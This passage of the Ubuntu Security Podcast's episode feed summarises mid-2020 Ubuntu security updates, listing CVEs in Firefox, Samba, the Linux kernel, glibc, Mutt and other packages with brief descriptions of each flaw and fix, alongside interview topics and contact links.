<li>4 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11538">CVE-2020-11538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10994">CVE-2020-10994</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10378">CVE-2020-10378</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10177">CVE-2020-10177</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python Imaging Library - used for image handling by lots of Python GUIs</li>
<li>All OOB reads on crafted input -&gt; crash, DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="john-johansen-and-steve-beattie-talk-linux-security-modules-with-joe-10-51">John Johansen and Steve Beattie talk Linux Security Modules with Joe [10:51]</h3>
<ul>
<li><a href="https://www.kernel.org/doc/html/latest/security/lsm.html">https://www.kernel.org/doc/html/latest/security/lsm.html</a></li>
<li><a href="https://lwn.net/Articles/808048/">https://lwn.net/Articles/808048/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E083.mp3" length="27835363" type="audio/mpeg" /><itunes:duration>28:59</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 82
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-82/</link>
          <pubDate>Fri, 17 Jul 2020 15:57:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>fad46f7f27cd0613e1502019cc3cb04ca16bd428b3a99ac77dee5d0ba09930260cd8300eace72aca05d42682ac44d42ba50bb257be30e423b3e5300237b93a76</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 82</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          With Ubuntu 19.10 going EOL, we have a special interview by Joe with Chris
  Coulson and Steve Beattie from the Ubuntu Security Team to talk TPMs and
  Ubuntu Core 20, plus Alex looks at some of the 71 CVEs addressed by the
  team and more....
        
        ]]></itunes:subtitle>
        <itunes:summary>  With Ubuntu 19.10 going EOL, we have a special interview by Joe with Chris
  Coulson and Steve Beattie from the Ubuntu Security Team to talk TPMs and
  Ubuntu Core 20, plus Alex looks at some of the 71 CVEs addressed by the
  team and more.
  </itunes:summary>
        <description>  With Ubuntu 19.10 going EOL, we have a special interview by Joe with Chris
  Coulson and Steve Beattie from the Ubuntu Security Team to talk TPMs and
  Ubuntu Core 20, plus Alex looks at some of the 71 CVEs addressed by the
  team and more.
  </description>
        <googleplay:description>  With Ubuntu 19.10 going EOL, we have a special interview by Joe with Chris
  Coulson and Steve Beattie from the Ubuntu Security Team to talk TPMs and
  Ubuntu Core 20, plus Alex looks at some of the 71 CVEs addressed by the
  team and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>With Ubuntu 19.10 going EOL, we have a special interview by Joe with Chris
Coulson and Steve Beattie from the Ubuntu Security Team to talk TPMs and
Ubuntu Core 20, plus Alex looks at some of the 71 CVEs addressed by the
team and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>71 unique CVEs addressed</p>
<h3 id="usn-4407-1-libvncserver-vulnerabilities-01-02">[<a href="https://usn.ubuntu.com/4407-1/">USN-4407-1</a>] LibVNCServer vulnerabilities [01:02]</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-18922">CVE-2017-18922</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20788">CVE-2019-20788</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15690">CVE-2019-15690</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15681">CVE-2019-15681</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15680">CVE-2019-15680</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Used by gnome-remote-desktop, virtualbox and others</li>
<li>Provides both a server <strong>and</strong> client libraries
<ul>
<li>So some issues affect clients when connecting to a malicious server,
others could be from a malicious client to the server</li>
</ul>
</li>
<li>Issues when handling WebSocket frames, cursor shape updates,
ServerCutText messages and decompression of zlib compressed data - crash -&gt;
DoS, info leak, RCE etc</li>
</ul>
<h3 id="usn-4408-1-firefox-vulnerabilities-01-57">[<a href="https://usn.ubuntu.com/4408-1/">USN-4408-1</a>] Firefox vulnerabilities [01:57]</h3>
<ul>
<li>11 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12421">CVE-2020-12421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12426">CVE-2020-12426</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12425">CVE-2020-12425</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12424">CVE-2020-12424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12422">CVE-2020-12422</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12420">CVE-2020-12420</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12419">CVE-2020-12419</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12418">CVE-2020-12418</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12417">CVE-2020-12417</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12416">CVE-2020-12416</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12415">CVE-2020-12415</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>78.0.1</li>
<li>Would reject certificate chains for addons which did not terminate in a
built-in root certificate - could cause some add-ons to become outdated
as it would reject updates for them</li>
<li>Usual web browser issues -&gt; crafted website DoS, info leak, bypass
permission prompts or RCE</li>
</ul>
<h3 id="usn-4409-1-samba-vulnerabilities-03-00">[<a href="https://usn.ubuntu.com/4409-1/">USN-4409-1</a>] Samba vulnerabilities [03:00]</h3>
<ul>
<li>3 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10760">CVE-2020-10760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10745">CVE-2020-10745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10730">CVE-2020-10730</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 separate issues when handling LDAP queries -&gt; both UAF -&gt; crash -&gt; DoS
or RCE</li>
<li>CPU based DoS when processing NetBIOS over TCP/IP</li>
</ul>
<h3 id="usn-4410-1-net-snmp-vulnerability-03-44">[<a href="https://usn.ubuntu.com/4410-1/">USN-4410-1</a>] Net-SNMP vulnerability [03:44]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20892">CVE-2019-20892</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Double free -&gt; heap memory corruption -&gt; crash / RCE</li>
</ul>
<h3 id="usn-4411-1-linux-kernel-vulnerabilities-04-02">[<a href="https://usn.ubuntu.com/4411-1/">USN-4411-1</a>] Linux kernel vulnerabilities [04:02]</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12768">CVE-2020-12768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13143">CVE-2020-13143</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12770">CVE-2020-12770</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10711">CVE-2020-10711</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10732">CVE-2020-10732</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 kernel</li>
<li>Various low impact issues - info leak due to failure to initialise memory
when handling ELF code, SELinux network label handling NULL ptr deref,
SCSI driver OOB read, USB gadget OOB read via configfs etc</li>
</ul>
<h3 id="usn-4412-1-linux-kernel-vulnerabilities-04-57">[<a href="https://usn.ubuntu.com/4412-1/">USN-4412-1</a>] Linux kernel vulnerabilities [04:57]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Eoan (19.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12768">CVE-2020-12768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10751">CVE-2020-10751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13143">CVE-2020-13143</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12770">CVE-2020-12770</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10711">CVE-2020-10711</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.3 kernel (bionic HWE)</li>
<li>Most of above plus an SELinux failure to validate all parts of a
multi-part netlink message - could then possibly bypass SELinux access
controls - SELinux is not the default LSM in Ubuntu - AppArmor</li>
</ul>
<h3 id="usn-4413-1-linux-kernel-vulnerabilities-05-58">[<a href="https://usn.ubuntu.com/4413-1/">USN-4413-1</a>] Linux kernel vulnerabilities [05:58]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12768">CVE-2020-12768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10751">CVE-2020-10751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13143">CVE-2020-13143</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12770">CVE-2020-12770</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10711">CVE-2020-10711</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.0 kernel (gke/oem)</li>
</ul>
<h3 id="usn-4414-1-linux-kernel-vulnerabilities-06-10">[<a href="https://usn.ubuntu.com/4414-1/">USN-4414-1</a>] Linux kernel vulnerabilities [06:10]</h3>
<ul>
<li>12 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19039">CVE-2019-19039</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12380">CVE-2019-12380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13143">CVE-2020-13143</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12770">CVE-2020-12770</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10711">CVE-2020-10711</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19462">CVE-2019-19462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19377">CVE-2019-19377</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19816">CVE-2019-19816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19813">CVE-2019-19813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19318">CVE-2019-19318</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19036">CVE-2019-19036</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16089">CVE-2019-16089</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 kernel (bionic / xenial hwe)</li>
<li>Some of above, plus others <strong>and</strong> a kernel-&gt;user space relay bug where
local user could trigger a crash -&gt; DoS via improper return values to the
kernel</li>
</ul>
<h3 id="usn-4419-1-linux-kernel-vulnerabilities-06-49">[<a href="https://usn.ubuntu.com/4419-1/">USN-4419-1</a>] Linux kernel vulnerabilities [06:49]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8992">CVE-2020-8992</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13143">CVE-2020-13143</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12770">CVE-2020-12770</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10711">CVE-2020-10711</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10690">CVE-2020-10690</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 kernel (xenial / trusty hwe)</li>
<li>ptp race condition during device allocation and removal due to a dangling
pointer to free&rsquo;d memory</li>
</ul>
<h3 id="usn-4415-1-coturn-vulnerabilities-07-33">[<a href="https://usn.ubuntu.com/4415-1/">USN-4415-1</a>] coTURN vulnerabilities [07:33]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-6062">CVE-2020-6062</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6061">CVE-2020-6061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-4067">CVE-2020-4067</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>TURN / STUN server used to traverse VoIP media traffic over NAT with a
telnet / HTTPS management interface</li>
<li>Info leak due to failure to zero memory used for response buffers</li>
<li>Improper handling of HTTP POST requests to the web interface -&gt; DoS /
info-leak etc</li>
</ul>
<h3 id="usn-4416-1-gnu-c-library-vulnerabilities-08-04">[<a href="https://usn.ubuntu.com/4416-1/">USN-4416-1</a>] GNU C Library vulnerabilities [08:04]</h3>
<ul>
<li>11 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1752">CVE-2020-1752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-1751">CVE-2020-1751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10029">CVE-2020-10029</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9169">CVE-2019-9169</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19126">CVE-2019-19126</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-6485">CVE-2018-6485</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19591">CVE-2018-19591</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11237">CVE-2018-11237</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11236">CVE-2018-11236</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18269">CVE-2017-18269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12133">CVE-2017-12133</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failure to handle regex/s, bit patters, path tilde expansion, hostname
lookups, memalign &amp; AVX-512 optimised memcpy() etc -&gt; memory corruption
-&gt; crash / RCE</li>
<li>Possible ASLR bypass for setuid() programs since would not respect the
LD_PREFER_MAP_32BIT_EXEC environment variable after security transition
and so a local attcker could use this to restrict the range of memory
addresses used when loading libraries</li>
</ul>
<h3 id="usn-4417-1-usn-4417-2-nss-vulnerability-09-38">[<a href="https://usn.ubuntu.com/4417-1/">USN-4417-1</a>, <a href="https://usn.ubuntu.com/4417-2/">USN-4417-2</a>] NSS vulnerability [09:38]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12402">CVE-2020-12402</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible RSA side-channel due to input-dependent code flow - would allow
possible RSA private key extraction via electromagnetic-based
side-channel measurements</li>
</ul>
<h3 id="usn-4418-1-openexr-vulnerabilities-10-06">[<a href="https://usn.ubuntu.com/4418-1/">USN-4418-1</a>] OpenEXR vulnerabilities [10:06]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15306">CVE-2020-15306</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15305">CVE-2020-15305</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow and UAF</li>
</ul>
<h3 id="usn-4420-1-cinder-and-os-brick-vulnerability-10-13">[<a href="https://usn.ubuntu.com/4420-1/">USN-4420-1</a>] Cinder and os-brick vulnerability [10:13]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-10755">CVE-2020-10755</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible exposure of credentials when using the Dell EMC ScaleIO or
VxFlex OS backend storage drivers - credentials would be accessible via
the connection_info element in various API calls - instead credentials
get moved to a file on disk so may require some changes on various
deployed environments as a result</li>
</ul>
<h3 id="usn-4421-1-thunderbird-vulnerabilities-10-52">[<a href="https://usn.ubuntu.com/4421-1/">USN-4421-1</a>] Thunderbird vulnerabilities [10:52]</h3>
<ul>
<li>10 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12421">CVE-2020-12421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12399">CVE-2020-12399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12398">CVE-2020-12398</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12420">CVE-2020-12420</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12419">CVE-2020-12419</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12418">CVE-2020-12418</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12417">CVE-2020-12417</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12410">CVE-2020-12410</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12406">CVE-2020-12406</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12405">CVE-2020-12405</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>68.10.0</li>
<li>Most firefox issues mentioned earlier, plus a specific TB one where if an
attacker could potentially intercept and modify traffic across a STARTTLS
IMAP server by responding with a PREAUTH.</li>
</ul>
<h3 id="usn-4376-2-openssl-vulnerabilities-11-33">[<a href="https://usn.ubuntu.com/4376-2/">USN-4376-2</a>] OpenSSL vulnerabilities [11:33]</h3>
<ul>
<li>3 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1563">CVE-2019-1563</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1559">CVE-2019-1559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1547">CVE-2019-1547</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-77/">Episode 77</a></li>
</ul>
<h3 id="usn-4422-1-webkitgtk-plus-vulnerabilities-11-40">[<a href="https://usn.ubuntu.com/4422-1/">USN-4422-1</a>] WebKitGTK+ vulnerabilities [11:40]</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9850">CVE-2020-9850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9843">CVE-2020-9843</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9807">CVE-2020-9807</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9806">CVE-2020-9806</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9805">CVE-2020-9805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9803">CVE-2020-9803</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9802">CVE-2020-9802</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13753">CVE-2020-13753</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4423-1-firefox-vulnerability-11-52">[<a href="https://usn.ubuntu.com/4423-1/">USN-4423-1</a>] Firefox vulnerability [11:52]</h3>
<ul>
<li>Affecting Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)</li>
<li>78.0.2</li>
<li>Possible click-jacking attack via crafted X-Frame-Options bypass when
visiting a specially crafted website (no CVE..)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-talks-tpms-and-ubuntu-core-20-with-chris-coulson-and-steve-beattie-12-30">Joe talks TPMs and Ubuntu Core 20 with Chris Coulson and Steve Beattie [12:30]</h3>
<ul>
<li><a href="https://forum.snapcraft.io/t/uc20-beta1-released/18631">https://forum.snapcraft.io/t/uc20-beta1-released/18631</a></li>
</ul>
<h3 id="ubuntu-19-dot-10-eoan-ermine-goes-end-of-life-23-12">Ubuntu 19.10 Eoan Ermine goes end-of-life [23:12]</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-July/005494.html">https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-July/005494.html</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E082.mp3" length="23522860" type="audio/mpeg" /><itunes:duration>24:30</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 81
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-81/</link>
          <pubDate>Fri, 03 Jul 2020 12:28:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>96dabe7210ab90c56ce077c80456e3b140f35accdcbb024dc478e5827b235d909fbbe0a2c2c0fd6530ba219b42bce627b2801a3e75a0fa1efa443b111c5a9b38</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 81</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Joe talks cyber security policy with Dr David Reed from CU Boulder, plus
  Alex covers the week in security updates including Mutt, NVIDIA graphics
  drivers, Mailman and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Joe talks cyber security policy with Dr David Reed from CU Boulder, plus
  Alex covers the week in security updates including Mutt, NVIDIA graphics
  drivers, Mailman and more.
  </itunes:summary>
        <description>  Joe talks cyber security policy with Dr David Reed from CU Boulder, plus
  Alex covers the week in security updates including Mutt, NVIDIA graphics
  drivers, Mailman and more.
  </description>
        <googleplay:description>  Joe talks cyber security policy with Dr David Reed from CU Boulder, plus
  Alex covers the week in security updates including Mutt, NVIDIA graphics
  drivers, Mailman and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Joe talks cyber security policy with Dr David Reed from CU Boulder, plus
Alex covers the week in security updates including Mutt, NVIDIA graphics
drivers, Mailman and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>6 unique CVEs addressed</p>
<h3 id="usn-4403-1-mutt-vulnerability-and-regression-00-40">[<a href="https://usn.ubuntu.com/4403-1/">USN-4403-1</a>] Mutt vulnerability and regression [00:40]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14954">CVE-2020-14954</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>When connecting to an IMAP/SMTP/POP3 server via STARTTLS, would read
additional data after the clear-text command to begin TLS - if someone
was able to intercept the connection they could inject content which
would then later get processed by Mutt as though it had come from the TLS
connection. Fixed to simply clear input buffer at the start of TLS
negotiation.</li>
<li>Also includes a fix for a possible regression in the previous security
update (<a href="https://ubuntusecuritypodcast.org/episode-80/">Episode 80</a>)</li>
</ul>
<h3 id="usn-4404-1-usn-4404-2-nvidia-graphics-drivers-and-linux-kernel-vulnerabilities-01-59">[<a href="https://usn.ubuntu.com/4404-1/">USN-4404-1</a>, <a href="https://usn.ubuntu.com/4404-2/">USN-4404-2</a>] NVIDIA graphics drivers &amp; Linux kernel vulnerabilities [01:59]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-5973">CVE-2020-5973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-5967">CVE-2020-5967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-5963">CVE-2020-5963</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CUDA driver failed to properly perform access control during IPC - could
allow a local attacker to DoS/RCE</li>
<li>UVM driver (Unified Virtual Memory - used with CUDA driver for better
performance) race condition - local attacker DoS</li>
<li>Virtual guest GPU driver unspecified vuln -&gt; privileged operations -&gt; DoS</li>
<li>Updates the linux kernel source package since this is used to provide the
DKMS packages</li>
</ul>
<h3 id="usn-4405-1-glib-networking-vulnerability-03-15">[<a href="https://usn.ubuntu.com/4405-1/">USN-4405-1</a>] GLib Networking vulnerability [03:15]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Eoan (19.10), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13645">CVE-2020-13645</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>glib-networking - additional library for glib/gio to provide TLS (ie
links against gnutls etc.)</li>
<li>Would fail to verify that the hostname of a server&rsquo;s TLS certificate
matches the expected hostname by the client - but only if the client
failed to specify the hostname itself. If did not provide hostname, would
expect it to fail validation completely. Balsa (GNOME mail client) did
this, so could possibly be tricked into connecting to a different mail
server as a result.</li>
</ul>
<h3 id="usn-4406-1-mailman-vulnerability-04-48">[<a href="https://usn.ubuntu.com/4406-1/">USN-4406-1</a>] Mailman vulnerability [04:48]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15011">CVE-2020-15011</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to validate inputs to the private archive login page - would then
echo these back inside the generated page and so provides arbitrary
content injection from a crafted URL.</li>
</ul>
